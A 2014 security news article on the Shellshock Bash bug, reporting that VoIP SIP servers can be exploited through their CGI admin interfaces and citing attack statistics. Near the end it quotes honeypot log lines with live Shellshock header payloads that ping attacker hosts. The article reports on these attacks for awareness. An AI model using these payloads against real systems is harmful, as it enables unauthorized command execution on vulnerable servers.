Categories: HackingSecurity

ShellShock could be used to hack VoIP systems

Jaime Blasco at AlienVault Labs explained that ShellShock vulnerability could be  exploited to hack Voice over IP systems worldwide.

The Shellshock Bash is monopolizing the debate on the Internet security in these days, every vendor is assessing its product to verify the impact of the critical vulnerability Bash Bug (CVE-2014-6271). Apple recently announced that its Mac OS X based computers are safe by default meanwhile Oracle announced that at least 32 of its solutions are affected.

As I explained several times, the impact of Shellshock Bash is really serious, an impressive amount of devices and service run vulnerable software that are not easy to update, let’s think, for example to IoT devices or voice-over-IP (VoIP) phone systems.

Today we will talk about the exposure of VOIP systems to the Shellshock Bash, compromising these systems threat actors could access to business communication systems with serious repercussion for enterprise security.

The Shellshock Bash bug affects also VoIP phone vendor’s session initiation protocol (SIP) server as revealed by the director of AlienVault Labs, Jaime Blasco, and as usually happen the flaw is likely widespread because many vendors use similar architectures.

“I’m pretty sure that there are a bunch of them (vendors), if not a lot of them, that you can exploit,” Blasco said declining to name the vendor.

The main component of VoIP systems is the SIP server, which often runs on Unix or Linux, another critical component is such architecture is the media server. While the media server implements media management functionalities, such as the transmission of the audio, the VoIP server is typically used to manage users’ configuration and phone hardware managements.

Unfortunately a large number of SIP servers run GNU BASH which is affected by the Shellshock vulnerability, this means that an attacker could exploit it to execute malicious commands by sending them via the Common Gateway Interfaceof the SIP server’s administrative interface.

“Even if you don’t have the username and password (for the SIP server), you can exploit the vulnerability,” Blasco said.

The possibility for at attacker are different, threat actors could exploit the Shellshock flaw to change the configuration of the VoIP systems, to add and remove new users and hardware to the system, or to serve a malware to the SIP server and gain access to a company network.

The attacks to VoIP systems are very common, phone systems are privileged targets for hackers that intend to spy on communications of the targeted organization.

The disclosure of the Shellshock flaw has triggered a series of attacks on a large scale, security researchers reported that bad actors were trying to exploit Bash Bug flaw worldwide.

Security firm Incapsula reported that in a 12-hour period, its systems recorded 725 attacks, originated from 400 unique IP addresses mainly located in US and China,  per hour against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said.

Typically attackers run scanning of the entire Internet to identify vulnerable machines and run the exploits, their purpose is compromise targeted machines to recruit in botnet.

Experts at AlienVault are running a new module in their honeypots to track the attempts exploiting the ShellShock bug, in just 24 hours they detected several hits.

The majority of attacks is scanning the Internet simple sending a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74
122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200
89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200
user-agent, () { :;}; /bin/ping -c 1 198.101.206.138

The experts also detected two attackers that are exploiting the ShellShock flaw to serve and install two different pieces of malware on the victims and it is just the beginning!

Pierluigi Paganini

(Security Affairs – ShellShock, Linux)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

Google: China dominates government exploitation of zero-day vulnerabilities in 2023

Google's Threat Analysis Group (TAG) and Mandiant reported a surge in the number of actively…

1 hour ago

Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024

Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during…

13 hours ago

INC Ransom stole 3TB of data from the National Health Service (NHS) of Scotland

The INC Ransom extortion group hacked the National Health Service (NHS) of Scotland and is threatening…

17 hours ago

CISA adds Microsoft SharePoint bug disclosed at Pwn2Own to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft SharePoint vulnerability disclosed at the…

22 hours ago

The DDR Advantage: Real-Time Data Defense

This is the advantage of Data Detection and Response (DDR) for organizations aiming to build…

1 day ago

Finnish police linked APT31 to the 2021 parliament attack

The Finnish Police attributed the attack against the parliament that occurred in March 2021 to…

1 day ago

This website uses cookies.